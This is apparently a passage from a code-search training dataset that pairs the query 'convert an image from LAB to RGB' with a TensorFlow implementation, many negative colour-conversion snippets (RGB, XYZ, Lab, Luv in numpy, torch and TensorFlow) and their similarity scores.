r * 0.4124564 + g * 0.3575761 + b * 0.1804375\n y = r * 0.2126729 + g * 0.7151522 + b * 0.0721750\n z = r * 0.0193339 + g * 0.1191920 + b * 0.9503041\n\n # http://www.brucelindbloom.com/index.html?Eqn_XYZ_to_Lab.html\n kappa, epsilon = 903.3, 0.008856\n\n # http://brucelindbloom.com/index.html?Eqn_ChromAdapt.html\n # White point for D65\n xr, yr, zr = x / 0.95047, y / 1.00000, z / 1.08883\n\n fx = xr ** (1 / 3.0) if xr > epsilon else (kappa * xr + 16) / 116.0\n fy = yr ** (1 / 3.0) if yr > epsilon else (kappa * yr + 16) / 116.0\n fz = zr ** (1 / 3.0) if zr > epsilon else (kappa * zr + 16) / 116.0\n\n l = 166.0 * fy - 16.0\n a = 500.0 * (fx - fy)\n b = 200.0 * (fy - fz)\n\n return l, a, b", "def XYZ_to_Lab(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n temp_x = cobj.xyz_x / illum[\"X\"]\r\n temp_y = cobj.xyz_y / illum[\"Y\"]\r\n temp_z = cobj.xyz_z / illum[\"Z\"]\r\n \r\n if temp_x > color_constants.CIE_E:\r\n temp_x = math.pow(temp_x, (1.0 / 3.0))\r\n else:\r\n temp_x = (7.787 * temp_x) + (16.0 / 116.0) \r\n\r\n if temp_y > color_constants.CIE_E:\r\n temp_y = math.pow(temp_y, (1.0 / 3.0))\r\n else:\r\n temp_y = (7.787 * temp_y) + (16.0 / 116.0)\r\n \r\n if temp_z > color_constants.CIE_E:\r\n temp_z = math.pow(temp_z, (1.0 / 3.0))\r\n else:\r\n temp_z = (7.787 * temp_z) + (16.0 / 116.0)\r\n \r\n lab_l = (116.0 * temp_y) - 16.0\r\n lab_a = 500.0 * (temp_x - temp_y)\r\n lab_b = 200.0 * (temp_y - temp_z)\r\n return LabColor(\r\n lab_l, lab_a, lab_b, observer=cobj.observer, illuminant=cobj.illuminant)", "def rgb2Lab(rgbvalue):\r\n RGB2Lab_Matrix = np.array([[0.412453, 0.357580, 0.180423],\r\n [0.212671, 0.715160, 0.072169],\r\n [0.019334, 0.119193, 0.950227]])\r\n R = rgbvalue[0]\r\n G = rgbvalue[1]\r\n B = rgbvalue[2]\r\n gammaR = gamma(R / 255.0)\r\n gammaG = gamma(G / 255.0)\r\n gammaB = gamma(B / 255.0)\r\n RGBvalue = np.array([gammaR, gammaG, gammaB])\r\n RGBvalue = RGBvalue.reshape(3, 1)\r\n XYZvalue = np.dot(RGB2Lab_Matrix, RGBvalue)\r\n assert XYZvalue.shape == (3, 1)\r\n correction = np.array([[1.0 / 0.950456, 1.0, 1.0 / 1.088754]]).T\r\n assert correction.shape == (3, 1)\r\n XYZ = XYZvalue * correction\r\n assert XYZ.shape == (3, 1)\r\n YYn = ft(XYZ[1])\r\n XXn = ft(XYZ[0])\r\n ZZn = ft(XYZ[2])\r\n L = 116 * YYn - 16\r\n a = 500 * (XXn - YYn)\r\n b = 200 * (YYn - ZZn)\r\n return [int(L), int(a), int(b)]", "def sRGBToLab(rgb):\n return xyzToLab(xyzFromsRGB(rgb), [0.9504559, 1, 1.089058])", "def Lab_to_XYZ(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n xyz_y = (cobj.lab_l + 16.0) / 116.0\r\n xyz_x = cobj.lab_a / 500.0 + xyz_y\r\n xyz_z = xyz_y - cobj.lab_b / 200.0\r\n \r\n if math.pow(xyz_y, 3) > color_constants.CIE_E:\r\n xyz_y = math.pow(xyz_y, 3)\r\n else:\r\n xyz_y = (xyz_y - 16.0 / 116.0) / 7.787\r\n\r\n if math.pow(xyz_x, 3) > color_constants.CIE_E:\r\n xyz_x = math.pow(xyz_x, 3)\r\n else:\r\n xyz_x = (xyz_x - 16.0 / 116.0) / 7.787\r\n \r\n if math.pow(xyz_z, 3) > color_constants.CIE_E:\r\n xyz_z = math.pow(xyz_z, 3)\r\n else:\r\n xyz_z = (xyz_z - 16.0 / 116.0) / 7.787\r\n \r\n xyz_x = (illum[\"X\"] * xyz_x)\r\n xyz_y = (illum[\"Y\"] * xyz_y)\r\n xyz_z = (illum[\"Z\"] * xyz_z)\r\n \r\n return XYZColor(\r\n xyz_x, xyz_y, xyz_z, observer=cobj.observer, illuminant=cobj.illuminant)", "def luv_to_rgb(image: torch.Tensor, eps: float = 1e-12) -> torch.Tensor:\n if not isinstance(image, torch.Tensor):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(image)}\")\n\n if len(image.shape) < 3 or image.shape[-3] != 3:\n raise ValueError(f\"Input size must have a shape of (*, 3, H, W). Got {image.shape}\")\n\n L: torch.Tensor = image[..., 0, :, :]\n u: torch.Tensor = image[..., 1, :, :]\n v: torch.Tensor = image[..., 2, :, :]\n\n # Convert from Luv to XYZ\n y: torch.Tensor = torch.where(L > 7.999625, torch.pow((L + 16) / 116, 3.0), L / 903.3)\n\n # Compute white point\n xyz_ref_white: Tuple[float, float, float] = (0.95047, 1.0, 1.08883)\n u_w: float = (4 * xyz_ref_white[0]) / (xyz_ref_white[0] + 15 * xyz_ref_white[1] + 3 * xyz_ref_white[2])\n v_w: float = (9 * xyz_ref_white[1]) / (xyz_ref_white[0] + 15 * xyz_ref_white[1] + 3 * xyz_ref_white[2])\n\n a: torch.Tensor = u_w + u / (13 * L + eps)\n d: torch.Tensor = v_w + v / (13 * L + eps)\n c: torch.Tensor = 3 * y * (5 * d - 3)\n\n z: torch.Tensor = ((a - 4) * c - 15 * a * d * y) / (12 * d + eps)\n x: torch.Tensor = -(c / (d + eps) + 3.0 * z)\n\n xyz_im: torch.Tensor = torch.stack([x, y, z], -3)\n\n rgbs_im: torch.Tensor = xyz_to_rgb(xyz_im)\n\n # Convert from RGB Linear to sRGB\n rgb_im = linear_rgb_to_rgb(rgbs_im)\n\n return rgb_im", "def rgb2alpha(img):\n\t### First of all we need the size of our picture to make the transforms\n\n\tx = len(img) ; y = len(img[0])\n\talpha = np.full((x, y, 3), 0, dtype = float)\t\t## This will be the transformed image\n\n\t### Now we gotta access each pixel of the picture\n\n\tfor i, vi in enumerate(img):\n\t\tfor j, px in enumerate(vi):\n\t\t\t### There we are\n\n\t\t\t# Step 1 : LMS transform, for that we use r_l\n\n\t\t\talpha[i][j] = np.matmul(r_l, px)\n\n\t\t\t# Step 2 : log em all (decimal log)\n\n\t\t\talpha[i][j][0] = log(alpha[i][j][0])\n\t\t\talpha[i][j][1] = log(alpha[i][j][1])\n\t\t\talpha[i][j][2] = log(alpha[i][j][2])\n\n\t\t\t# Step 3 : l alpha beta transform, by using l_a\n\n\t\t\talpha[i][j] = np.matmul(l_a, alpha[i][j])\n\n\treturn alpha", "def sRGBFromLab(lab):\n return xyzTosRGB(labToXYZ(lab, [0.9504559, 1, 1.089058]))", "def example_rgb_to_xyz():\r\n\r\n print(\"=== RGB Example: RGB->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n rgb = sRGBColor(120, 130, 140)\r\n # Show a string representation.\r\n print(rgb)\r\n # Convert RGB to XYZ using a D50 illuminant.\r\n xyz = convert_color(rgb, XYZColor, target_illuminant='D50')\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def lab_to_xyz(image: tf.Tensor) -> tf.Tensor:\n l, a, b = tf.unstack(image, axis=-1)\n\n var_y = (l + 16) / 116\n var_x = a / 500 + var_y\n var_z = var_y - b / 200\n var_x = tf.where(tf.pow(var_x, 3) > 0.008856, tf.pow(var_x, 3),\n (var_x - 16 / 116) / 7.787)\n var_y = tf.where(tf.pow(var_y, 3) > 0.008856, tf.pow(var_y, 3),\n (var_y - 16 / 116) / 7.787)\n var_z = tf.where(tf.pow(var_z, 3) > 0.008856, tf.pow(var_z, 3),\n (var_z - 16 / 116) / 7.787)\n\n refx = 95.047\n refy = 100.00\n ref_z = 108.883\n\n x = var_x * refx\n y = var_y * refy\n z = var_z * ref_z\n xyz_image = tf.stack([x, y, z], axis=-1)\n return xyz_image", "def sRGBToLabD50(rgb):\n return xyzToLab(xyzFromsRGBD50(rgb), [0.9642957, 1, 0.8251046])", "def xyz_to_lab(image: tf.Tensor) -> tf.Tensor:\n x, y, z = tf.unstack(image, axis=-1)\n\n refx = 95.047\n refy = 100.00\n refz = 108.883\n\n var_x = x / refx\n var_y = y / refy\n var_z = z / refz\n\n var_x = tf.where(var_x > 0.008856, tf.pow(var_x, 1 / 3),\n (7.787 * var_x) + (16 / 116))\n var_y = tf.where(var_y > 0.008856, tf.pow(var_y, 1 / 3),\n (7.787 * var_y) + (16 / 116))\n var_z = tf.where(var_z > 0.008856, tf.pow(var_z, 1 / 3),\n (7.787 * var_z) + (16 / 116))\n\n l = (116 * var_y) - 16\n a = 500 * (var_x - var_y)\n b = 200 * (var_y - var_z)\n lab_image = tf.stack([l, a, b], axis=-1)\n return lab_image", "def example_lab_to_rgb():\r\n\r\n print(\"=== RGB Example: Lab->RGB ===\")\r\n # Instantiate an Lab color object with the given values.\r\n lab = LabColor(0.903, 16.296, -2.217)\r\n # Show a string representation.\r\n print(lab)\r\n # Convert to XYZ.\r\n rgb = convert_color(lab, sRGBColor)\r\n print(rgb)\r\n print(\"=== End Example ===\\n\")", "def sRGBFromLabD50(lab):\n return xyzTosRGBD50(labToXYZ(lab, [0.9642957, 1, 0.8251046]))", "def _convert_to_yolo_img(self, img):\n\n img = img / 255.0\n h, w, c = img.shape\n img = img.transpose(2, 0, 1)\n outimg = make_image(w, h, c)\n img = img.reshape((w*h*c))\n data = c_array(c_float, img)\n outimg.data = data\n rgbgr_image(outimg)\n return outimg", "def l_to_rgb(img_l):\n lab = np.squeeze(255 * (img_l + 1) / 2)\n return color.gray2rgb(lab) / 255", "def get_rgb(self, img, r, g, b):\r\n\r\n # Get specific bands of hyperspectral image\r\n red_channel = img[:, :, r]\r\n green_channel = img[:, :, g]\r\n blue_channel = img[:, :, b]\r\n\r\n img = np.stack((red_channel, green_channel, blue_channel), axis=2)\r\n img = img.astype('float32')\r\n return img", "def example_lab_to_xyz():\r\n\r\n print(\"=== Simple Example: Lab->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n lab = LabColor(0.903, 16.296, -2.22)\r\n # Show a string representation.\r\n print(lab)\r\n # Convert to XYZ.\r\n xyz = convert_color(lab, XYZColor)\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def rgb_to_xyz(image: tf.Tensor) -> tf.Tensor:\n r, g, b = tf.unstack(image, axis=-1)\n var_r = r / 255\n var_g = g / 255\n var_b = b / 255\n\n var_r = tf.where(var_r > 0.04045, tf.pow((var_r + 0.055) / 1.055, 2.4),\n var_r / 12.92)\n var_g = tf.where(var_g > 0.04045, tf.pow((var_g + 0.055) / 1.055, 2.4),\n var_g / 12.92)\n var_b = tf.where(var_b > 0.04045, tf.pow((var_b + 0.055) / 1.055, 2.4),\n var_b / 12.92)\n var_r = var_r * 100\n var_g = var_g * 100\n var_b = var_b * 100\n\n x = var_r * 0.4124 + var_g * 0.3576 + var_b * 0.1805\n y = var_r * 0.2126 + var_g * 0.7152 + var_b * 0.0722\n z = var_r * 0.0193 + var_g * 0.1192 + var_b * 0.9505\n\n image_xyz = tf.stack([x, y, z], axis=-1)\n return image_xyz", "def matplotlib_image(image):\n if image.ndim == 2:\n rgb = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\n else:\n rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n return rgb", "def xyz_to_rgb(image: tf.Tensor) -> tf.Tensor:\n x, y, z = tf.unstack(image, axis=-1)\n var_x = x / 100\n var_y = y / 100\n var_z = z / 100\n\n var_r = var_x * 3.2406 + var_y * -1.5372 + var_z * -0.4986\n var_g = var_x * -0.9689 + var_y * 1.8758 + var_z * 0.0415\n var_b = var_x * 0.0557 + var_y * -0.2040 + var_z * 1.0570\n\n var_r = tf.where(var_r > 0.0031308,\n 1.055 * tf.pow(var_r, (1 / 2.4)) - 0.055,\n 12.92 * var_r)\n var_g = tf.where(var_g > 0.0031308,\n 1.055 * tf.pow(var_g, (1 / 2.4)) - 0.055,\n 12.92 * var_g)\n var_b = tf.where(var_b > 0.0031308,\n 1.055 * tf.pow(var_b, (1 / 2.4)) - 0.055,\n 12.92 * var_b)\n r = var_r * 255\n g = var_g * 255\n b = var_b * 255\n rgb_image = tf.cast(tf.stack([r, g, b], axis=-1), tf.uint8)\n return rgb_image", "def convert_color(image, color_space):\n out_image = None\n if color_space != 'RGB':\n if color_space == 'HSV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YCrCb)\n else:\n out_image = np.copy(image)\n return out_image", "def sRGBLuminance(x):\n lin=linearFromsRGB3(x)\n return lin[0]*0.2126+lin[1]*0.7152+lin[2]*0.0722", "def rgb_to_luv(image: torch.Tensor, eps: float = 1e-12) -> torch.Tensor:\n if not isinstance(image, torch.Tensor):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(image)}\")\n\n if len(image.shape) < 3 or image.shape[-3] != 3:\n raise ValueError(f\"Input size must have a shape of (*, 3, H, W). Got {image.shape}\")\n\n # Convert from sRGB to Linear RGB\n lin_rgb = rgb_to_linear_rgb(image)\n\n xyz_im: torch.Tensor = rgb_to_xyz(lin_rgb)\n\n x: torch.Tensor = xyz_im[..., 0, :, :]\n y: torch.Tensor = xyz_im[..., 1, :, :]\n z: torch.Tensor = xyz_im[..., 2, :, :]\n\n threshold = 0.008856\n L: torch.Tensor = torch.where(y > threshold, 116.0 * torch.pow(y.clamp(min=threshold), 1.0 / 3.0) - 16.0, 903.3 * y)\n\n # Compute reference white point\n xyz_ref_white: Tuple[float, float, float] = (0.95047, 1.0, 1.08883)\n u_w: float = (4 * xyz_ref_white[0]) / (xyz_ref_white[0] + 15 * xyz_ref_white[1] + 3 * xyz_ref_white[2])\n v_w: float = (9 * xyz_ref_white[1]) / (xyz_ref_white[0] + 15 * xyz_ref_white[1] + 3 * xyz_ref_white[2])\n\n u_p: torch.Tensor = (4 * x) / (x + 15 * y + 3 * z + eps)\n v_p: torch.Tensor = (9 * y) / (x + 15 * y + 3 * z + eps)\n\n u: torch.Tensor = 13 * L * (u_p - u_w)\n v: torch.Tensor = 13 * L * (v_p - v_w)\n\n out = torch.stack([L, u, v], dim=-3)\n\n return out", "def rgb_processing(rgb_img, center, scale, rot=0):\n rgb_img = crop(rgb_img, center, scale, \n [constants.IMG_RES, constants.IMG_RES], rot=rot)\n # (3,224,224),float,[0,1]\n rgb_img = np.transpose(rgb_img.astype('float32'),(2,0,1))/255.0\n return rgb_img", "def colorize_images(self, img):\n self.load_model()\n self.mdn.eval()\n self.vae.eval()\n n, _, _ = img.shape\n img = img.astype(np.float32) / 255\n img = torch.tensor(img, dtype=torch.float, device=self.device).unsqueeze(1)\n with torch.no_grad():\n z = self.mdn(img)\n ab_out = self.vae.decode(z)\n lab_out = torch.cat((img, ab_out), dim=1)\n lab_out = self.unnormalize(lab_out).cpu().numpy()\n lab_out = np.transpose(lab_out, (0, 2, 3, 1)).astype(np.uint8)\n for i in range(n):\n color_out = cv2.cvtColor(lab_out[i], cv2.COLOR_LAB2BGR)\n color_out = cv2.resize(color_out, (96, 96), interpolation=cv2.INTER_AREA)\n cv2.imwrite(\"../datasets/stl10/divcolor/{}.png\".format(str(i)), color_out)\n return" ]
[ "0.76128566", "0.736024", "0.7093746", "0.70733243", "0.688894", "0.67929274", "0.67809963", "0.6703727", "0.66217625", "0.6567671", "0.6539482", "0.6528808", "0.6519189", "0.64457124", "0.64197767", "0.63783777", "0.637468", "0.630608", "0.6248861", "0.6204791", "0.618432", "0.6093022", "0.60678786", "0.6041543", "0.6036307", "0.6030892", "0.59891975", "0.59683686", "0.5943061", "0.5936455" ]
0.7743007
0
Convert an image from LAB color space to RGB color space LAB > XYZ > RGB
def lab_to_rgb(image: tf.Tensor) -> tf.Tensor: xyz = lab_to_xyz(image) rgb_image = xyz_to_rgb(xyz) return rgb_image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lab_to_rgb(img):\n new_img = np.zeros((256, 256, 3))\n for i in range(len(img)):\n for j in range(len(img[i])):\n pix = img[i, j]\n new_img[i, j] = [(pix[0] + 1) * 50, (pix[1] + 1) / 2 * 255 - 128, (pix[2] + 1) / 2 * 255 - 128]\n new_img = color.lab2rgb(new_img) * 255\n new_img = new_img.astype('uint8')\n return new_img", "def rgb_to_lab(image: tf.Tensor) -> tf.Tensor:\n xyz = rgb_to_xyz(image)\n lab_image = xyz_to_lab(xyz)\n return lab_image", "def lab_to_rgb(img_l, img_ab):\n lab = np.empty([*img_l.shape[0:2], 3])\n lab[:, :, 0] = np.squeeze(((img_l + 1) * 50))\n lab[:, :, 1:] = img_ab * 127\n return color.lab2rgb(lab)", "def example_rgb_to_xyz():\r\n\r\n print(\"=== RGB Example: RGB->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n rgb = sRGBColor(120, 130, 140)\r\n # Show a string representation.\r\n print(rgb)\r\n # Convert RGB to XYZ using a D50 illuminant.\r\n xyz = convert_color(rgb, XYZColor, target_illuminant='D50')\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def sRGBFromLab(lab):\n return xyzTosRGB(labToXYZ(lab, [0.9504559, 1, 1.089058]))", "def Lab_to_XYZ(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n xyz_y = (cobj.lab_l + 16.0) / 116.0\r\n xyz_x = cobj.lab_a / 500.0 + xyz_y\r\n xyz_z = xyz_y - cobj.lab_b / 200.0\r\n \r\n if math.pow(xyz_y, 3) > color_constants.CIE_E:\r\n xyz_y = math.pow(xyz_y, 3)\r\n else:\r\n xyz_y = (xyz_y - 16.0 / 116.0) / 7.787\r\n\r\n if math.pow(xyz_x, 3) > color_constants.CIE_E:\r\n xyz_x = math.pow(xyz_x, 3)\r\n else:\r\n xyz_x = (xyz_x - 16.0 / 116.0) / 7.787\r\n \r\n if math.pow(xyz_z, 3) > color_constants.CIE_E:\r\n xyz_z = math.pow(xyz_z, 3)\r\n else:\r\n xyz_z = (xyz_z - 16.0 / 116.0) / 7.787\r\n \r\n xyz_x = (illum[\"X\"] * xyz_x)\r\n xyz_y = (illum[\"Y\"] * xyz_y)\r\n xyz_z = (illum[\"Z\"] * xyz_z)\r\n \r\n return XYZColor(\r\n xyz_x, xyz_y, xyz_z, observer=cobj.observer, illuminant=cobj.illuminant)", "def example_lab_to_rgb():\r\n\r\n print(\"=== RGB Example: Lab->RGB ===\")\r\n # Instantiate an Lab color object with the given values.\r\n lab = LabColor(0.903, 16.296, -2.217)\r\n # Show a string representation.\r\n print(lab)\r\n # Convert to XYZ.\r\n rgb = convert_color(lab, sRGBColor)\r\n print(rgb)\r\n print(\"=== End Example ===\\n\")", "def rgb2Lab(rgbvalue):\r\n RGB2Lab_Matrix = np.array([[0.412453, 0.357580, 0.180423],\r\n [0.212671, 0.715160, 0.072169],\r\n [0.019334, 0.119193, 0.950227]])\r\n R = rgbvalue[0]\r\n G = rgbvalue[1]\r\n B = rgbvalue[2]\r\n gammaR = gamma(R / 255.0)\r\n gammaG = gamma(G / 255.0)\r\n gammaB = gamma(B / 255.0)\r\n RGBvalue = np.array([gammaR, gammaG, gammaB])\r\n RGBvalue = RGBvalue.reshape(3, 1)\r\n XYZvalue = np.dot(RGB2Lab_Matrix, RGBvalue)\r\n assert XYZvalue.shape == (3, 1)\r\n correction = np.array([[1.0 / 0.950456, 1.0, 1.0 / 1.088754]]).T\r\n assert correction.shape == (3, 1)\r\n XYZ = XYZvalue * correction\r\n assert XYZ.shape == (3, 1)\r\n YYn = ft(XYZ[1])\r\n XXn = ft(XYZ[0])\r\n ZZn = ft(XYZ[2])\r\n L = 116 * YYn - 16\r\n a = 500 * (XXn - YYn)\r\n b = 200 * (YYn - ZZn)\r\n return [int(L), int(a), int(b)]", "def XYZ_to_Lab(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n temp_x = cobj.xyz_x / illum[\"X\"]\r\n temp_y = cobj.xyz_y / illum[\"Y\"]\r\n temp_z = cobj.xyz_z / illum[\"Z\"]\r\n \r\n if temp_x > color_constants.CIE_E:\r\n temp_x = math.pow(temp_x, (1.0 / 3.0))\r\n else:\r\n temp_x = (7.787 * temp_x) + (16.0 / 116.0) \r\n\r\n if temp_y > color_constants.CIE_E:\r\n temp_y = math.pow(temp_y, (1.0 / 3.0))\r\n else:\r\n temp_y = (7.787 * temp_y) + (16.0 / 116.0)\r\n \r\n if temp_z > color_constants.CIE_E:\r\n temp_z = math.pow(temp_z, (1.0 / 3.0))\r\n else:\r\n temp_z = (7.787 * temp_z) + (16.0 / 116.0)\r\n \r\n lab_l = (116.0 * temp_y) - 16.0\r\n lab_a = 500.0 * (temp_x - temp_y)\r\n lab_b = 200.0 * (temp_y - temp_z)\r\n return LabColor(\r\n lab_l, lab_a, lab_b, observer=cobj.observer, illuminant=cobj.illuminant)", "def rgb_to_lab(img, l=False, ab=False):\n img = img / 255\n l_chan = color.rgb2lab(img)[:, :, 0]\n l_chan = l_chan / 50 - 1\n l_chan = l_chan[..., np.newaxis]\n\n ab_chan = color.rgb2lab(img)[:, :, 1:]\n ab_chan = (ab_chan + 128) / 255 * 2 - 1\n if l:\n return l_chan\n else:\n return ab_chan", "def rgb2lab(r, g, b):\n r, g, b = r / 255.0, g / 255.0, b / 255.0\n\n # http://www.brucelindbloom.com/index.html?Math.html\n # Inverse sRGB Companding\n r = r / 12.92 if r <= 0.04045 else ((r + 0.055) / 1.055) ** 2.4\n g = g / 12.92 if g <= 0.04045 else ((g + 0.055) / 1.055) ** 2.4\n b = b / 12.92 if b <= 0.04045 else ((b + 0.055) / 1.055) ** 2.4\n\n # http://www.brucelindbloom.com/index.html?Eqn_RGB_XYZ_Matrix.html\n # sRGB, D65\n x = r * 0.4124564 + g * 0.3575761 + b * 0.1804375\n y = r * 0.2126729 + g * 0.7151522 + b * 0.0721750\n z = r * 0.0193339 + g * 0.1191920 + b * 0.9503041\n\n # http://www.brucelindbloom.com/index.html?Eqn_XYZ_to_Lab.html\n kappa, epsilon = 903.3, 0.008856\n\n # http://brucelindbloom.com/index.html?Eqn_ChromAdapt.html\n # White point for D65\n xr, yr, zr = x / 0.95047, y / 1.00000, z / 1.08883\n\n fx = xr ** (1 / 3.0) if xr > epsilon else (kappa * xr + 16) / 116.0\n fy = yr ** (1 / 3.0) if yr > epsilon else (kappa * yr + 16) / 116.0\n fz = zr ** (1 / 3.0) if zr > epsilon else (kappa * zr + 16) / 116.0\n\n l = 166.0 * fy - 16.0\n a = 500.0 * (fx - fy)\n b = 200.0 * (fy - fz)\n\n return l, a, b", "def get_rgb(self, img, r, g, b):\r\n\r\n # Get specific bands of hyperspectral image\r\n red_channel = img[:, :, r]\r\n green_channel = img[:, :, g]\r\n blue_channel = img[:, :, b]\r\n\r\n img = np.stack((red_channel, green_channel, blue_channel), axis=2)\r\n img = img.astype('float32')\r\n return img", "def luv_to_rgb(image: torch.Tensor, eps: float = 1e-12) -> torch.Tensor:\n if not isinstance(image, torch.Tensor):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(image)}\")\n\n if len(image.shape) < 3 or image.shape[-3] != 3:\n raise ValueError(f\"Input size must have a shape of (*, 3, H, W). Got {image.shape}\")\n\n L: torch.Tensor = image[..., 0, :, :]\n u: torch.Tensor = image[..., 1, :, :]\n v: torch.Tensor = image[..., 2, :, :]\n\n # Convert from Luv to XYZ\n y: torch.Tensor = torch.where(L > 7.999625, torch.pow((L + 16) / 116, 3.0), L / 903.3)\n\n # Compute white point\n xyz_ref_white: Tuple[float, float, float] = (0.95047, 1.0, 1.08883)\n u_w: float = (4 * xyz_ref_white[0]) / (xyz_ref_white[0] + 15 * xyz_ref_white[1] + 3 * xyz_ref_white[2])\n v_w: float = (9 * xyz_ref_white[1]) / (xyz_ref_white[0] + 15 * xyz_ref_white[1] + 3 * xyz_ref_white[2])\n\n a: torch.Tensor = u_w + u / (13 * L + eps)\n d: torch.Tensor = v_w + v / (13 * L + eps)\n c: torch.Tensor = 3 * y * (5 * d - 3)\n\n z: torch.Tensor = ((a - 4) * c - 15 * a * d * y) / (12 * d + eps)\n x: torch.Tensor = -(c / (d + eps) + 3.0 * z)\n\n xyz_im: torch.Tensor = torch.stack([x, y, z], -3)\n\n rgbs_im: torch.Tensor = xyz_to_rgb(xyz_im)\n\n # Convert from RGB Linear to sRGB\n rgb_im = linear_rgb_to_rgb(rgbs_im)\n\n return rgb_im", "def sRGBToLab(rgb):\n return xyzToLab(xyzFromsRGB(rgb), [0.9504559, 1, 1.089058])", "def sRGBFromLabD50(lab):\n return xyzTosRGBD50(labToXYZ(lab, [0.9642957, 1, 0.8251046]))", "def xyz_to_rgb(image: tf.Tensor) -> tf.Tensor:\n x, y, z = tf.unstack(image, axis=-1)\n var_x = x / 100\n var_y = y / 100\n var_z = z / 100\n\n var_r = var_x * 3.2406 + var_y * -1.5372 + var_z * -0.4986\n var_g = var_x * -0.9689 + var_y * 1.8758 + var_z * 0.0415\n var_b = var_x * 0.0557 + var_y * -0.2040 + var_z * 1.0570\n\n var_r = tf.where(var_r > 0.0031308,\n 1.055 * tf.pow(var_r, (1 / 2.4)) - 0.055,\n 12.92 * var_r)\n var_g = tf.where(var_g > 0.0031308,\n 1.055 * tf.pow(var_g, (1 / 2.4)) - 0.055,\n 12.92 * var_g)\n var_b = tf.where(var_b > 0.0031308,\n 1.055 * tf.pow(var_b, (1 / 2.4)) - 0.055,\n 12.92 * var_b)\n r = var_r * 255\n g = var_g * 255\n b = var_b * 255\n rgb_image = tf.cast(tf.stack([r, g, b], axis=-1), tf.uint8)\n return rgb_image", "def l_to_rgb(img_l):\n lab = np.squeeze(255 * (img_l + 1) / 2)\n return color.gray2rgb(lab) / 255", "def rgb2alpha(img):\n\t### First of all we need the size of our picture to make the transforms\n\n\tx = len(img) ; y = len(img[0])\n\talpha = np.full((x, y, 3), 0, dtype = float)\t\t## This will be the transformed image\n\n\t### Now we gotta access each pixel of the picture\n\n\tfor i, vi in enumerate(img):\n\t\tfor j, px in enumerate(vi):\n\t\t\t### There we are\n\n\t\t\t# Step 1 : LMS transform, for that we use r_l\n\n\t\t\talpha[i][j] = np.matmul(r_l, px)\n\n\t\t\t# Step 2 : log em all (decimal log)\n\n\t\t\talpha[i][j][0] = log(alpha[i][j][0])\n\t\t\talpha[i][j][1] = log(alpha[i][j][1])\n\t\t\talpha[i][j][2] = log(alpha[i][j][2])\n\n\t\t\t# Step 3 : l alpha beta transform, by using l_a\n\n\t\t\talpha[i][j] = np.matmul(l_a, alpha[i][j])\n\n\treturn alpha", "def rgb_image(self):\n z3 = self.z[:,:,newaxis]\n return z3 * self.c", "def lab_to_xyz(image: tf.Tensor) -> tf.Tensor:\n l, a, b = tf.unstack(image, axis=-1)\n\n var_y = (l + 16) / 116\n var_x = a / 500 + var_y\n var_z = var_y - b / 200\n var_x = tf.where(tf.pow(var_x, 3) > 0.008856, tf.pow(var_x, 3),\n (var_x - 16 / 116) / 7.787)\n var_y = tf.where(tf.pow(var_y, 3) > 0.008856, tf.pow(var_y, 3),\n (var_y - 16 / 116) / 7.787)\n var_z = tf.where(tf.pow(var_z, 3) > 0.008856, tf.pow(var_z, 3),\n (var_z - 16 / 116) / 7.787)\n\n refx = 95.047\n refy = 100.00\n ref_z = 108.883\n\n x = var_x * refx\n y = var_y * refy\n z = var_z * ref_z\n xyz_image = tf.stack([x, y, z], axis=-1)\n return xyz_image", "def convert_color(image, color_space):\n out_image = None\n if color_space != 'RGB':\n if color_space == 'HSV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YCrCb)\n else:\n out_image = np.copy(image)\n return out_image", "def rgb_to_xyz(image: tf.Tensor) -> tf.Tensor:\n r, g, b = tf.unstack(image, axis=-1)\n var_r = r / 255\n var_g = g / 255\n var_b = b / 255\n\n var_r = tf.where(var_r > 0.04045, tf.pow((var_r + 0.055) / 1.055, 2.4),\n var_r / 12.92)\n var_g = tf.where(var_g > 0.04045, tf.pow((var_g + 0.055) / 1.055, 2.4),\n var_g / 12.92)\n var_b = tf.where(var_b > 0.04045, tf.pow((var_b + 0.055) / 1.055, 2.4),\n var_b / 12.92)\n var_r = var_r * 100\n var_g = var_g * 100\n var_b = var_b * 100\n\n x = var_r * 0.4124 + var_g * 0.3576 + var_b * 0.1805\n y = var_r * 0.2126 + var_g * 0.7152 + var_b * 0.0722\n z = var_r * 0.0193 + var_g * 0.1192 + var_b * 0.9505\n\n image_xyz = tf.stack([x, y, z], axis=-1)\n return image_xyz", "def rgb_processing(rgb_img, center, scale, rot=0):\n rgb_img = crop(rgb_img, center, scale, \n [constants.IMG_RES, constants.IMG_RES], 